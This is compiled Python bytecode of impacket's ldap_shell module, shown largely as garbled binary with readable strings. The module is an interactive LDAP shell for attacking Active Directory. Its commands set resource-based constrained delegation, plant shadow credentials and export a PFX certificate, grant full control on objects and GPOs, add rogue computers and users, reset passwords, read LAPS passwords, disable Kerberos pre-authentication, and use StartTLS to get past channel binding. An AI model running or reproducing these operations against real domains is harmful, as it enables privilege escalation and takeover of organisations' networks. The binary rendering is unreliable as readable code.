o
    àý°j·‡  ã                   @   sÆ   d dl Z d dlZd dlZd dlZd dlZd dlZd dlmZ d dlm	Z	 d dl
mZ d dlZd dlmZ d dlmZ d dlmZmZmZmZmZ d dlmZ d d	lmZ d dlZG d
d„ dejƒZdS )é    N)ÚRESULT_UNWILLING_TO_PERFORM©Úescape_filter_chars)ÚPY2)ÚLOG)Úsecurity_descriptor_control)ÚACCESS_ALLOWED_OBJECT_ACEÚACCESS_MASKÚACCESS_ALLOWED_ACEÚACEÚOBJECTTYPE_GUID_MAP)Ú	ldaptypes)Úshadow_credentialsc                   @   s  e Zd ZdZdd„ Zdd„ Zdd„ Zdd	„ Zd
d„ Zdd„ Z	dd„ Z
dd„ Zdd„ Zdd„ Zdd„ Zdd„ Zdd„ Zdd„ Zdd„ Zd d!„ Zd"d#„ Zd$d%„ Zd&d'„ Zd(d)„ Zd*d+„ Zd,d-„ Zd.d/„ Zd0d1„ Zd2d3„ Zd4d5„ Zd6d7„ Zd8d9„ Zd:d;„ Z d<d=„ Z!d>d?„ Z"d@dA„ Z#dBdC„ Z$dDS )EÚ	LdapShellz1.2.840.113556.1.4.1941c                 C   s„   t jj| |j|jd� trttƒ t d¡ |jt_|jt_|jt_	d| _
|| _d| _d | _d| _d| _d | _g | _|| _|| _d S )N)ÚstdinÚstdoutÚutf8Fz
# zType help for list of commandsT)ÚcmdÚCmdÚ__init__r   r   r   ÚreloadÚsysÚsetdefaultencodingÚstderrÚuse_rawinputÚshellÚpromptÚtidÚintroÚloggedInÚlast_outputÚ
completionÚclientÚdomain_dumper)ÚselfÚ	tcp_shellr#   r"   © r&   ú�/root/aizidognhua/tmp/workspace/projects/ec89d86c-575f-41c9-af57-ac45cbdbf775/venv/lib/python3.10/site-packages/impacket/examples/ldap_shell.pyr   &   s"   

zLdapShell.__init__c                 C   s   d S ©Nr&   )r$   r&   r&   r'   Ú	emptyline=   s   zLdapShell.emptylinec              
   C   s`   d}z
t j | |¡}W |S  ty/ } zt|ƒ t |¡ tjddd� W Y d }~|S d }~ww )NFzException infoT)Úexc_info)r   r   ÚonecmdÚ	ExceptionÚprintr   ÚerrorÚdebug)r$   ÚsÚret_valÚer&   r&   r'   r+   @   s   û
€ûzLdapShell.onecmdc                 C   s|   t  ¡ }d|d< d|d< d|d< t  ¡ |d< |d  d¡ d	|d
< d	|d< t  ¡ }d|d< d|d< d|d< g |_||d< |S )Nó   ÚRevisionó    ÚSbz1i€  ÚControlÚOwnerSidzS-1-5-32-544ó    ÚGroupSidÚSaclé   ÚAclRevisionr   ÚSbz2ÚDacl)r   ÚSR_SECURITY_DESCRIPTORÚLDAP_SIDÚfromCanonicalÚACLÚaces)r$   ÚsdÚaclr&   r&   r'   Úcreate_empty_sdK   s   zLdapShell.create_empty_sdc                 C   sb   t  ¡ }t jj|d< d|d< t  ¡ }t  ¡ |d< d|d d< t  ¡ |d< |d  |¡ ||d< |S )NÚAceTyper   ÚAceFlagsÚMaskiÿ ÚSidÚAce)r   r   r
   ÚACE_TYPEr	   rA   rB   )r$   ÚsidÚnaceÚacedatar&   r&   r'   Úcreate_allow_ace]   s   zLdapShell.create_allow_acec                 C   sn  t  |¡}td|d |d f ƒ t|ƒdkrtdƒ‚|d }|d }| jj| jjd| dgd� t| jj	ƒdkr=td	ƒ‚| jj	d }t
d
d�}| jj| jjd| ddg|d� t| jj	ƒdkrdtdƒ‚| jj	d }|d jd }tj|d�}	|  t|d ƒ¡}
|	d d  |
¡ |	 ¡ }| jj|jdtj|gfi|d� | jjd dkr«tdƒ d S tdt| jjd ƒ ƒ‚)NzAdding %s to GPO with GUID %sr   é   é   z*A samaccountname and GPO sid are required.z*(&(objectclass=person)(sAMAccountName=%s))Ú	objectSid©Ú
attributeszDidnt find the given userr<   ©Úsdflagsz.(&(objectclass=groupPolicyContainer)(name=%s))ÚnTSecurityDescriptor©rV   ÚcontrolszDidnt find the given gpo©Údatar?   ÚData©r[   Úresultz<LDAP server claims to have taken the secdescriptor. Have funzSomething wasnt right: %sÚdescription)ÚshlexÚsplitr-   Úlenr,   r"   Úsearchr#   ÚrootÚentriesr   Ú
raw_valuesr   r@   rQ   ÚstrÚappendÚgetDataÚmodifyÚentry_dnÚldap3ÚMODIFY_REPLACEr`   )r$   ÚlineÚargsÚtgtUserÚgposidÚuserr[   ÚgpoÚsecDescDataÚsecDescÚnewacer]   r&   r&   r'   Údo_write_gpo_dacli   s0   

  zLdapShell.do_write_gpo_daclc                 C   sŒ  t  |¡}| jjjs| jjstdƒ t|ƒdkr(t|ƒdkr(t|ƒdkr(tdƒ‚|d }| 	d¡s5|d7 }td| ƒ d	}t|ƒdksI|d d
krVd	 
dd„ tdƒD ƒ¡}n|d }| jj}tjdd|| d¡d … tjd�dd … }td| ƒ td| ƒ |d d… }d|| jjf }td| ƒ t|ƒdkr±|d d
kr§d||f g}	n[tdt|d ƒ ƒ‚t|ƒdkrÞ|d d
krÐd| d||f d| d||f g}	n2|d d
krÝd||f g}	n$t|ƒdkr÷d| d||f d| d||f g}	ntdt| jd ƒ ƒ‚d||f d|	|d |¡ d¡d œ}
| j |g d!¢|
¡}|�s<| jjd" tk�r0td#ƒ d S td$t| jjƒ ƒ d S td%||f ƒ d S )&Nz5Error adding a new computer with LDAP requires LDAPS.rR   rS   é   z_Error expected a computer name, an optional password argument, and an optional nospns argument.r   ú$z2Attempting to add a new computer with the name: %sÚ Únospnsc                 s   ó(   � | ]}t  tjtj tj ¡V  qd S r(   ©ÚrandomÚchoiceÚstringÚascii_lettersÚdigitsÚpunctuation©Ú.0Ú_r&   r&   r'   Ú	<genexpr>›   ó   €& z,LdapShell.do_add_computer.<locals>.<genexpr>é   z,DC=Ú.zDC=)ÚflagszInferred Domain DN: %szInferred Domain Name: %séÿÿÿÿzCN=%s,CN=Computers,%szNew Computer DN: %sz
HOST/%s.%szInvalid third argument: %szHOST/%szRestrictedKrbHost/%szRestrictedKrbHost/%s.%sz%s.%si   ú"{}"ú	utf-16-le)ÚdnsHostNameÚuserAccountControlÚservicePrincipalNameÚsAMAccountNameÚ
unicodePwd)ÚtopÚpersonÚorganizationalPersonrt   Úcomputerr`   z>Failed to add a new computer. The server denied the operation.z Failed to add a new computer: %szAAdding new computer with username: %s and password: %s result: OK)rb   rc   r"   ÚserverÚsslÚtls_startedr-   rd   r,   ÚendswithÚjoinÚranger#   rf   ÚreÚsubÚfindÚIri   rq   ÚformatÚencodeÚaddr`   r   )r$   rp   rq   Úcomputer_nameÚpasswordÚ	domain_dnÚdomainÚcomputer_hostnameÚcomputer_dnÚspnsÚucdÚresr&   r&   r'   Údo_add_computerŠ   sn   
$
*
ÿ

ü
ÿ€

ü
ûzLdapShell.do_add_computerc                 C   s(  t  |¡}t|ƒdkrtdƒ‚|d }|d }| jj| jjdt|ƒ ddgd� | jj	d j
}|s7td	| ƒ‚| jj	d }|d
 j}td| ƒ td| ƒ | j |dtj|gfi¡ | jjd dkritdƒ d S | jjd dkrztd| jjd ƒ‚| jjd dkr‹td| jjd ƒ‚td| jjd ƒ‚)NrS   ziCurrent Computer sAMAccountName and New Computer sAMAccountName required (rename_computer comp1$ comp2$).r   rR   ú(sAMAccountName=%s)rT   r”   rU   zComputer not found in LDAP: %sÚsamAccountNamezOriginal sAMAccountName: %szNew sAMAccountName: %sr`   z#Updated sAMAccountName successfullyé2   úCCould not modify object, the server reports insufficient rights: %sÚmessageé   úGCould not modify object, the server reports a constrained violation: %sú The server returned an error: %s)rb   rc   rd   r,   r"   re   r#   rf   r   rg   rm   Úvaluer-   rl   rn   ro   r`   )r$   rp   rq   Úcurrent_nameÚnew_namer¬   Úentryr²   r&   r&   r'   Údo_rename_computer×   s*   
"
zLdapShell.do_rename_computerc           	      C   s&  t  |¡}| jjjs| jjstdƒ t|ƒdkrtdƒ‚|d }t|ƒdkr-d| j	j
 }n|d }d dd„ td	ƒD ƒ¡}d
||f }d| j	j
 ||||||dd|d |¡ d¡dœ}td|ƒ | j |g d¢|¡}|s‰| jjd tkr}| jjjs}tdƒ‚tdt| jjd ƒ ƒ‚td||f ƒ d S )Nz1Error adding a new user with LDAP requires LDAPS.r   zA username is required.rR   zCN=Users,%sr|   c                 s   r~   r(   r   r†   r&   r&   r'   r‰     rŠ   z(LdapShell.do_add_user.<locals>.<genexpr>r‹   zCN=%s,%sz'CN=Person,CN=Schema,CN=Configuration,%si   Ú0r�   r�   )ÚobjectCategoryÚdistinguishedNameÚcnÚsnÚ	givenNameÚdisplayNameÚnamer’   ÚaccountExpiresr”   r•   z Attempting to create user in: %s)r–   r—   r˜   rt   r`   zˆFailed to add a new user. The server denied the operation. Try relaying to LDAP with TLS enabled (ldaps) or escalating an existing user.zFailed to add a new user: %sra   z=Adding new user with username: %s and password: %s result: OK)rb   rc   r"   rš   r›   rœ   r-   rd   r,   r#   rf   rž   rŸ   r¤   r¥   r¦   r`   r   ri   )	r$   rp   rq   Únew_userÚ	parent_dnÚnew_passwordÚnew_user_dnr®   r¯   r&   r&   r'   Údo_add_userø   s<   

õ
zLdapShell.do_add_userc                 C   s¾   t  |¡\}}|  |¡}|std| ƒ‚|  |¡}|s!td| ƒ‚| d¡d dd … }| d¡d dd … }| j |dtj|gfgi¡}|rQtd||f ƒ d S td|t	| jj
d	 ƒf ƒ‚)
NúUser not found in LDAP: %súGroup not found in LDAP: %sú,r   rz   Úmemberz&Adding user: %s to group %s result: OKz"Failed to add user to %s group: %sra   )rb   rc   Úget_dnr,   r"   rl   rn   Ú
MODIFY_ADDr-   ri   r`   )r$   rp   Ú	user_nameÚ
group_nameÚuser_dnÚgroup_dnr¯   r&   r&   r'   Údo_add_user_to_group"  s   

zLdapShell.do_add_user_to_groupc                 C   s  t  |¡}t|ƒdkrt|ƒdkrtdt|ƒ ƒ‚|  |d ¡}td| ƒ d}t|ƒdkr;d dd„ td	ƒD ƒ¡}n|d }td
| ƒ | jj	j
 ||¡}| jjd dkr\tdƒ d S | jjd dkrmtd| jjd ƒ‚| jjd dkr~td| jjd ƒ‚td| jjd ƒ‚)NrR   rS   z_Error expected a username and an optional password argument. Instead %d arguments were providedr   zGot User DN: r|   c                 s   r~   r(   r   r†   r&   r&   r'   r‰   A  rŠ   z/LdapShell.do_change_password.<locals>.<genexpr>r‹   z%Attempting to set new password of: %sr`   zPassword changed successfully!r³   r´   rµ   r¶   r·   r¸   )rb   rc   rd   r,   rÐ   r-   rž   rŸ   r"   ÚextendÚ	microsoftÚmodify_passwordr`   )r$   rp   rq   rÔ   r¨   Úsuccessr&   r&   r'   Údo_change_password6  s$   
zLdapShell.do_change_passwordc                 C   s  | j j| jjdt|ƒ ddgd�}|du st| j jƒdkr&tdt| j jƒƒ‚| j jd }|d	 j}t	d
|j
 ƒ t	d| ƒ |  ¡ }| j  |j
dtj| ¡ ggi¡ | j jd dkr`t	dƒ d S | j jd dkrqtd| j jd ƒ‚| j jd dkr‚td| j jd ƒ‚td| j jd ƒ‚)Nr±   rT   ú(msDS-AllowedToActOnBehalfOfOtherIdentityrU   FrR   ú4Error expected only one search result got %d resultsr   Ú	objectsidúFound Target DN: %súTarget SID: %s
r`   z'Delegation rights cleared successfully!r³   r´   rµ   r¶   r·   r¸   )r"   re   r#   rf   r   rd   rg   r,   r¹   r-   rm   rG   rl   rn   ro   rk   r`   )r$   r§   rÚ   ÚtargetÚ
target_sidrE   r&   r&   r'   Údo_clear_rbcdR  s    "
 zLdapShell.do_clear_rbcdc                 C   s(   t dƒ | j ¡  | j ¡  t dƒ d S )NzDumping domain info...z Domain info dumped into lootdir!)r-   r   Úflushr#   Ú
domainDump©r$   rp   r&   r&   r'   Údo_dumpj  s   

zLdapShell.do_dumpc                 C   sD   | j js| j jjstdƒ | j  ¡ stdƒ‚tdƒ d S tdƒ d S )NzSending StartTLS command...zStartTLS failedz+StartTLS succeded, you are now using LDAPS!z9It seems you are already connected through a TLS channel.)r"   rœ   rš   r›   r-   Ú	start_tlsr,   ræ   r&   r&   r'   Údo_start_tlsp  s   
zLdapShell.do_start_tlsc                 C   ó   |   |d¡ d S )NF©Útoggle_account_enable_disable©r$   Úusernamer&   r&   r'   Údo_disable_accountz  ó   zLdapShell.do_disable_accountc                 C   rê   ©NTrë   rí   r&   r&   r'   Údo_enable_account}  rð   zLdapShell.do_enable_accountc                 C   s,  d}| j j| jjdt|ƒ ddgd� t| j jƒdkr$tdt| j jƒƒ‚| j jd j}|s3td	| ƒ‚| j jd }|d j	}t
d
| ƒ |rL|| @ }n||B }| j  |dtj|gfi¡ | j jd dkrkt
dƒ d S | j jd dkr|td| j jd ƒ‚| j jd dkr�td| j jd ƒ‚td| j jd ƒ‚)NrS   r±   rT   r’   rU   rR   rÝ   r   rÌ   úOriginal userAccountControl: %dr`   ú1Updated userAccountControl attribute successfullyr³   r´   rµ   r¶   r·   r¸   )r"   re   r#   rf   r   rd   rg   r,   rm   r¹   r-   rl   rn   ro   r`   )r$   rÒ   ÚenableÚUF_ACCOUNT_DISABLErÔ   r¼   r’   r&   r&   r'   rì   €  s*   "
z'LdapShell.toggle_account_enable_disablec                    sŠ   t  |¡‰ tˆ ƒdkrtdƒ‚g d¢}|d d … }| d¡ ˆ dd … D ]}| |¡ q$d ‡ fdd„|D ƒ¡}| jd	| g|¢R Ž  d S )
Nr   úA query is required.)rÅ   rÀ   r”   rT   rR   r|   c                 3   s$   � | ]}d |t ˆ d ƒf V  qdS )z	(%s=*%s*)r   Nr   )r‡   Ú	attribute©Ú	argumentsr&   r'   r‰   ¬  s   €" z&LdapShell.do_search.<locals>.<genexpr>z(|%s))rb   rc   rd   r,   rj   rž   re   )r$   rp   Úfilter_attributesrV   ÚargumentÚsearch_queryr&   rù   r'   Ú	do_search¡  s   

zLdapShell.do_searchc           
      C   s–  d}t  |¡}t|ƒdkrtdƒ‚|d }|d }d}| ¡ dkr$d}n| ¡ d	kr-d}ntd
ƒ‚| jj| jjdt	|ƒ ddgd� t| jj
ƒdkrStdt| jj
ƒƒ‚| jj
d j}|sbtd| ƒ‚| jj
d }|d j}	td|	 ƒ |rz|	|B }	n|	| @ }	td|	 ƒ | j |dtj|	gfi¡ | jjd dkr tdƒ d S | jjd dkr±td| jjd ƒ‚| jjd dkrÂtd| jjd ƒ‚td| jjd ƒ‚)Ni  @ rS   zJUsername (SAMAccountName) and true/false flag required (e.g. jsmith true).r   rR   FÚtrueTÚfalsez/The specified flag must be either true or falser±   rT   r’   rU   rÝ   rÌ   ró   zUpdated userAccountControl: %dr`   rô   r³   r´   rµ   r¶   r·   r¸   )rb   rc   rd   r,   Úlowerr"   re   r#   rf   r   rg   rm   r¹   r-   rl   rn   ro   r`   )
r$   rp   ÚUF_DONT_REQUIRE_PREAUTHrq   rÒ   Úflag_strÚflagrÔ   r¼   r’   r&   r&   r'   Údo_set_dontreqpreauth¯  sB   
"


zLdapShell.do_set_dontreqpreauthc                 C   s6   |   |¡}|std| ƒ‚|  dtjt|ƒf ¡ d S )NrÌ   z(member:%s:=%s)©rÐ   r,   re   r   ÚLDAP_MATCHING_RULE_IN_CHAINr   )r$   rÒ   rÔ   r&   r&   r'   Údo_get_user_groupsß  s   
zLdapShell.do_get_user_groupsc                 C   s:   |   |¡}|std| ƒ‚|  dtjt|ƒf dd¡ d S )NrÍ   z(memberof:%s:=%s)r”   rÅ   r  )r$   rÓ   rÕ   r&   r&   r'   Údo_get_group_usersæ  s   
 zLdapShell.do_get_group_usersc                 C   sŠ   | j j| jjdt|ƒ dgd� t| j jƒdkr!tdt| j jƒƒ‚| j jd }td|j	 ƒ |d j
}|d ur?td| ƒ d S td	ƒ d S )
Nr±   zms-MCS-AdmPwdrU   rR   rÝ   r   zFound Computer DN: %szLAPS Password: %sz)Unable to Read LAPS Password for Computer)r"   re   r#   rf   r   rd   rg   r,   r-   rm   r¹   )r$   r§   r™   r¨   r&   r&   r'   Údo_get_laps_passwordí  s    
zLdapShell.do_get_laps_passwordc                 C   sb  t  |¡}t|ƒdkr|\}}| jj}nt|ƒdkr |\}}}n
tdt|ƒ› d�ƒ‚| d¡r7| d¡r7|}ndt|ƒ› d�}t	dd	�}| j
j| jjdt|ƒ› d�d
g|d� | j
js_tdƒ‚t| j
jƒdkrktdƒ‚| j
jd d
 j}td|›d|›�ƒ | j
j||dg|d� | j
js‘tdƒ‚t| j
jƒdkr�tdƒ‚| j
jd }	td|›d|	j›�ƒ ztj|	d jd d�}
W n tyÈ   |  ¡ }
Y nw |
d j |  |¡¡ | j
j|	jdtj|
 ¡ ggi|d� | j
jd dkrþtdƒ t|›d|	j›�ƒ d S | j
jd dk�rtd| j
jd › �ƒ‚| j
jd dk�r&td| j
jd › �ƒ‚td | j
jd › �ƒ‚)!NrS   rz   zJExpecting target and grantee or search base, target and grantee. Received z arguments instead.ú(ú)z(sAMAccountName=r<   rW   rT   rZ   zGrantee not foundrR   zGrantee not uniquer   z	Resolved z to rY   zTarget not foundzTarget not uniquer\   r?   r_   r`   zDACL modified successfully!z now has control of r³   zACould not modify object, the server reports insufficient rights: rµ   r¶   zECould not modify object, the server reports a constrained violation: zThe server returned an error: )rb   rc   rd   r#   rf   r,   Ú
startswithr�   r   r   r"   re   rg   r¹   r-   rm   r   r@   rh   Ú
IndexErrorrG   rD   rj   rQ   rl   rn   ro   rk   r`   )r$   rp   rq   Útarget_specÚgrantee_nameÚtarget_baseÚtarget_filterr[   Úgrantee_sidÚtarget_entryrE   r&   r&   r'   Údo_grant_controlý  sP   


&ÿ$zLdapShell.do_grant_controlc                 C   s�  t  |¡}t|ƒdkrt|ƒdkrtdt|ƒ ƒ‚|d }|d }|d }|d }| jj| jjdt|ƒ ddgd�}|d	u sFt| jj	ƒdkrOtd
t| jj	ƒƒ‚| jj	d }|d j
}td|j ƒ td| ƒ | jj| jjdt|ƒ dgd�}|d	u sƒt| jj	ƒdkrŒtd
t| jj	ƒƒ‚| jj	d }	|	d j
}td|	j ƒ td| ƒ z7tj|d jd d�}
tdƒ |
d jD ] }td|d d  ¡  ƒ |d d  ¡ |krÙtdƒ  W d S q¹W n tyè   |  ¡ }
Y nw |
d j |  |¡¡ | j |jdtj|
 ¡ ggi¡ | jjd dk�rtdƒ td||f ƒ d S | jjd dk�r-td| jjd ƒ‚| jjd dk�r?td| jjd ƒ‚td| jjd ƒ‚)NrR   rS   zXError expecting target and grantee names for RBCD attack. Recieved %d arguments instead.r   r±   rT   rÜ   rU   FrÝ   rß   rà   zFound Grantee DN: %szGrantee SID: %sr\   zCurrently allowed sids:r?   z    %srL   rK   zEGrantee is already permitted to perform delegation to the target hostr`   z(Delegation rights modified successfully!z0%s can now impersonate users on %s via S4U2Proxyr³   r´   rµ   r¶   r·   r¸   )rb   rc   rd   r,   r"   re   r#   rf   r   rg   r¹   r-   rm   r   r@   rh   rD   ÚformatCanonicalr  rG   rj   rQ   rl   rn   ro   rk   r`   )r$   rp   rq   Útarget_namer  râ   r  rÚ   rá   ÚgranteerE   Úacer&   r&   r'   Údo_set_rbcd/  sX   
"
 
þýÿ zLdapShell.do_set_rbcdc              
   C   s>  t  |¡}t|ƒdkrtdt|ƒ ƒ‚|d }| jj| jjdt|ƒ ddgd�}|du s4t| jj	ƒdkr=td	t| jj	ƒƒ‚| jj	d }|d j
}td
|j ƒ td| ƒ tj|d�\}}t ¡ }	tj||	t ¡ d�}
tdtj|	d� ƒ z‘|d jt |
 ¡ |j¡g }| j |jdtj|gi¡ tdƒ | jjd dkrÐd dd„ tdƒD ƒ¡}d dd„ tdƒD ƒ¡}tj||||d� td| d ƒ td| ƒ W d S | jjd dkråtd| jjd  ƒ W d S | jjd dkrútd | jjd  ƒ W d S td!| jjd  ƒ W d S  t�y } ztd"ƒ W Y d }~d S d }~ww )#NrR   zYError expecting target name for shadow credentials attack. Recieved %d arguments instead.r   r±   rT   úmsDS-KeyCredentialLinkrU   FrÝ   rß   rà   )Úsubject)ÚdeviceIdÚcurrentTimez)KeyCredential generated with DeviceID: %s)Úbytesz&Shadow credentials successfully added!r`   r|   c                 s   ó"   � | ]}t  tjtj ¡V  qd S r(   ©r€   r�   r‚   rƒ   r„   ©r‡   Úir&   r&   r'   r‰   ƒ  ó   €  z0LdapShell.do_set_shadow_creds.<locals>.<genexpr>é   c                 s   r   r(   r!  r"  r&   r&   r'   r‰   „  r$  é   )r¨   Úpath_to_filez1Saved PFX (#PKCS12) certificate & key at path: %sz.pfxzMust be used with password: %sr³   r´   rµ   r¶   r·   r¸   z/Attribute msDS-KeyCredentialLink does not exist)rb   rc   rd   r,   r"   re   r#   rf   r   rg   r¹   r-   rm   r   ÚcreateSelfSignedX509CertificateÚgetDeviceIdÚKeyCredentialÚgetTicksNowÚuuidÚUUIDrh   ÚtoDNWithBinary2StringÚ
dumpBinaryrl   rn   ro   r`   rž   rŸ   Ú	exportPFXr  )r$   rp   rq   r  rÚ   rá   râ   ÚkeyÚcertificateÚ	device_idÚkeyCredentialÚ
new_valuesÚpathr¨   r2   r&   r&   r'   Údo_set_shadow_credsh  sN   
"

øúýþ€þzLdapShell.do_set_shadow_credsc                 C   s  | j j| jjdt|ƒ ddgd�}|du st| j jƒdkr&tdt| j jƒƒ‚| j jd }|d	 j}t	d
|j
 ƒ t	d| ƒ | j  |j
dtjg gi¡ | j jd dkrYt	dƒ d S | j jd dkrjtd| j jd ƒ‚| j jd dkr{td| j jd ƒ‚td| j jd ƒ‚)Nr±   rT   r  rU   FrR   rÝ   r   rÞ   rß   rà   r`   z(Shadow credentials cleared successfully!r³   r´   rµ   r¶   r·   r¸   )r"   re   r#   rf   r   rd   rg   r,   r¹   r-   rm   rl   rn   ro   r`   )r$   rá   rÚ   râ   r&   r&   r'   Údo_clear_shadow_creds“  s   "
zLdapShell.do_clear_shadow_credsc                 G   sp   | j j| jj||d� | j jD ]&}t|jƒ |D ]}|| j}|r,td||| jf ƒ qt|ƒr5tdƒ qd S )NrU   z%s: %sz---)	r"   re   r#   rf   rg   r-   rm   r¹   Úany)r$   ÚqueryrV   r¼   rø   r¹   r&   r&   r'   re   ¨  s   

€€ùzLdapShell.searchc                 C   sR   d|v r|S z| j j| jjdt|ƒ dgd� | j jd jW S  ty(   Y d S w )NrÎ   r±   rT   rU   r   )r"   re   r#   rf   r   rg   rm   r  )r$   Úsam_namer&   r&   r'   rÐ   ³  s    ÿzLdapShell.get_dnc                 C   s   t | jjj ¡ ƒ d S r(   )r-   r"   r×   ÚstandardÚwho_am_iræ   r&   r&   r'   Ú	do_whoami½  s   zLdapShell.do_whoamic                 C   s¾   t  |¡}t|ƒdkrtdƒ‚| jj}|d }ttg d¢|dd …  ƒƒ}| jj	j
j|||dd�}g }|jr?|| ¡ 7 }|js6|D ]}t|d ƒ |d  ¡ D ]	\}	}
t|	|
ƒ qOtƒ  qAd S )	Nr   r÷   )rÅ   r”   rÞ   rR   F)rV   Úsync_filterÚincremental_valuesÚdnrV   )rb   rc   rd   r,   r#   rf   ÚlistÚsetr"   r×   rØ   Údir_syncÚmore_resultsÚloopr-   Úitems)r$   rp   rú   r©   r?  rV   ÚsyncÚresultsr`   ÚkÚvr&   r&   r'   Ú
do_dirsyncÀ  s"   
ÿüzLdapShell.do_dirsyncc                 C   s   | j d ur
| j  ¡  dS rñ   )r   Úcloseræ   r&   r&   r'   Údo_exitÕ  s   

zLdapShell.do_exitc                 C   s   t dƒ d S )Na  
 add_computer computer [password] [nospns] - Adds a new computer to the domain with the specified password. If nospns is specified, computer will be created with only a single necessary HOST SPN. Requires LDAPS.
 rename_computer current_name new_name - Sets the SAMAccountName attribute on a computer object to a new value.
 add_user new_user [parent] - Creates a new user.
 add_user_to_group user group - Adds a user to a group.
 change_password user [password] - Attempt to change a given user's password. Requires LDAPS.
 clear_rbcd target - Clear the resource based constrained delegation configuration information.
 clear_shadow_creds target - Clear shadow credentials on the target (sAMAccountName).
 disable_account user - Disable the user's account.
 enable_account user - Enable the user's account.
 dump - Dumps the domain.
 search query [attributes,] - Search users and groups by name, distinguishedName and sAMAccountName.
 get_user_groups user - Retrieves all groups this user is a member of.
 get_group_users group - Retrieves all members of a group.
 get_laps_password computer - Retrieves the LAPS passwords associated with a given computer (sAMAccountName).
 grant_control [search_base] target grantee - Grant full control on a given target object (sAMAccountName or search filter, optional search base) to the grantee (sAMAccountName).
 set_dontreqpreauth user true/false - Set the don't require pre-authentication flag to true or false.
 set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
set_shadow_creds target - Set shadow credentials on the target object (sAMAccountName).
 start_tls - Send a StartTLS command to upgrade from LDAP to LDAPS. Use this to bypass channel binding for operations necessitating an encrypted channel.
 write_gpo_dacl user gpoSID - Write a full control ACE to the gpo for the given user. The gpoSID must be entered surrounding by {}.
 whoami - get connected user
 dirsync - Dirsync requested attributes
 exit - Terminates this session.©r-   ræ   r&   r&   r'   Údo_helpÚ  s   zLdapShell.do_helpc                 C   s   t dƒ dS )NzBye!
TrO  ræ   r&   r&   r'   Údo_EOFô  s   zLdapShell.do_EOFN)%Ú__name__Ú
__module__Ú__qualname__r  r   r)   r+   rG   rQ   ry   r°   r½   rË   rÖ   rÛ   rã   rç   ré   rï   rò   rì   rþ   r  r  r	  r
  r  r  r7  r8  re   rÐ   r>  rL  rN  rP  rQ  r&   r&   r&   r'   r   #   sF    !M!*
!029+
r   )r    r‚   r   r   r€   rn   Úldap3.core.resultsr   Úldap3.utils.convr   Úsixr   rb   Úimpacketr   Úldap3.protocol.microsoftr   Úimpacket.ldap.ldaptypesr   r	   r
   r   r   Úimpacket.ldapr   Ú"impacket.examples.ntlmrelayx.utilsr   r,  r   r   r&   r&   r&   r'   Ú<module>   s"   